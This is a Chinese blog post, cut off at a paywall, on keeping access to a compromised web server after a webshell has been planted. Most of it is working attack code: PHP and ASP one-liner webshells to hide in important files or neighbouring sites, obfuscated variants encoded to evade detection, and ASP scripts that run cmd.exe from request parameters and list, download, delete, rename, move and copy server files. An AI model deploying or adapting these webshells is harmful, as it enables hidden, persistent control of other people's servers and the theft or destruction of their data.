拿下webshell之后小朋友们应该怎么做

最新推荐文章于 2024-06-09 15:59:40 发布

wangyi_lin

最新推荐文章于 2024-06-09 15:59:40 发布

阅读量8.5k

点赞数 1

分类专栏： Web漏洞分析

本文链接：https://blog.csdn.net/wangyi_lin/article/details/9418403

版权

脱裤MysqlAccessMssqlPostgreSQLOracle提权维持访问

摘要由CSDN通过智能技术生成

维持访问

WebShell

一般大马在管理员发现后后会被删除，上传一些隐蔽的一句话，或者功能简单的脚本。

如果有旁站的话，插入WebShell到旁站。一句话可以插入到某些重要文件中。

插入的时候最好加上判断，可防止报错

<?php if(isset($_POST['1'])){eval($_POST['1']);}?>

ASP

后缀名

ashx asp aspx ascx asmx

绕过检测的方式

如果wscript.xxxxxx不能使用，可以使用classID调用，这里classID各个版本各有不同

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

一句话

一般一句话

<%eval request("MH")%>
<%eval request(chr(35))%>
<%IfRequest("1")<>""ThenExecuteGlobal(Request("1"))%>

编码一句话，不过还是没有去掉eval

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

利用<%%>和<script language=javascript runat=server></script>基本等价的道理，来去掉百分号。

使用VBS编码

<script language=vbs runat=server> 
Execute(HextoStr("65786563757465287265717565737428636872283335292929")) 
Function HextoStr(data) 
	HextoStr="EXECUTE """"" 
	C="&CHR(&H" 
	N=")" 
	Do While Len(data)>1 
		If IsNumeric(Left(data,1)) Then 
			HextoStr=HextoStr&C&Left(data,2)&N 
			data=Mid(data,3) 
		Else 
			HextoStr=HextoStr&C&Left(data,4)&N 
			data=Mid(data,5) 
		End If 
	Loop 
End Function 
</script>

使用JS编码

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode( 
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>

使用ScriptControl，这个没有仔细测试

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之，同时压入6个基对象作为参数
%>

url中输入

http://localhost/tmp.asp?
SubCode=sub e(Server,Response,Request,Application,Session,Error) eval(request("v")) end sub&v=response.write(server.mappath("tmp.asp"))

或者菜刀配置中写入

<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>

遍历目录

<%@ Language=vbscript %> 
<% 
'遍历目录以及目录下文件的函数 
%> 
<% 
Function Bianli(path,Recursion) 
	Set Fso=server.createobject("scripting.filesystemobject") 
	On Error Resume Next 
	Set Objfolder=fso.getfolder(path) 
	Set Objsubfolders=Objfolder.subfolders 
	Set Objfile = Objfolder.Files
	
	Response.write path
	For Each file in Objfile
		Response.write "<br>---" 
		Response.write file.name
	Next	
	
	For Each Objsubfolder In Objsubfolders
		Response.write "<p>" 
		if Recursion<>0 then
			call Bianli(path+"\"+Objsubfolder.name,Recursion) '递归 
		end if
	Next 
	Set Objfolder=nothing 
	Set Objsubfolders=nothing 
	Set Fso=nothing 
End Function 
%> 
<% 
dim path,Recursion
path = request("path")
Recursion = request("Recursion")
call Bianli(path,Recursion) '遍历d:盘 
%> 
<html>
<p>Testing...</p>
</html>

下载文件

<%@ language=vbscript codepage=65001%> 
  
  <% 
  'Filename must be input 
  if Request("Filename")="" then 
  response.write "<h1>Error:</h1>Filename is empty!<p>" 
  else 
  call downloadFile(Request("Filename")) 
  
  Function downloadFile(strFile) 
  ' make sure you are on the latest MDAC version for this to work 
  ' get full path of specified file 
  'strFilename = server.MapPath(strFile) 
  
  strFilename = strFile
  
  ' clear the buffer 
  Response.Buffer = True 
  Response.Clear 
  
  ' create stream 
  Set s = Server.CreateObject("ADODB.Stream") 
  s.Open 
  
  ' Set as binary 
  s.Type = 1 
  
  ' load in the file 
  on error resume next 
  
  ' check the file exists 
  Set fso = Server.CreateObject("Scripting.FileSystemObject") 
  if not fso.FileExists(strFilename) then 
  Response.Write("<h1>Error:</h1>"&strFilename&" does not exists!<p>") 
  Response.End 
  end if 
  
  ' get length of file 
  Set f = fso.GetFile(strFilename) 
  intFilelength = f.size 
  
  s.LoadFromFile(strFilename) 
  if err then 
  Response.Write("<h1>Error: </h1>Unknown Error!<p>") 
  Response.End 
  end if 
  
  ' send the headers to the users Browse 
  Response.AddHeader "Content-Disposition","attachment; filename="&f.name 
  Response.AddHeader "Content-Length",intFilelength 
  Response.CharSet = "UTF-8" 
  Response.ContentType = "application/octet-stream" 
  
  ' output the file to the browser 
  Response.BinaryWrite s.Read 
  Response.Flush 
  
  ' tidy up 
  s.Close 
  Set s = Nothing 
  
  End Function 
  end if 
  %>

执行命令

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

自己上传cmd的话这样写

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>

删除文件

<%
filepath=request("path")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(filepath)
Set fso = nothing
%>

重命名文件

<%
Set fso = Server.CreateObject("Scripting.FileSystemObject") 
Set f = fso.GetFile(request("path"))
f.name =request("filename")
newname=f.name
response.write "已更名为"&newname
%>

移动文件

<%
dim fso 
set fso = server.createobject("scripting.filesystemobject") 
fso.movefolder request("name1"),request("name2") 
set fso = nothing  
%>

复制文件

<%
dim MyFSO
set MyFSO=Server.CreateObject("Scripting.FileSystemObject")
MyFSO.CopyFile request("name1"),request("name2")
set MyFSO=nothing
%></

最低0.47元/天解锁文章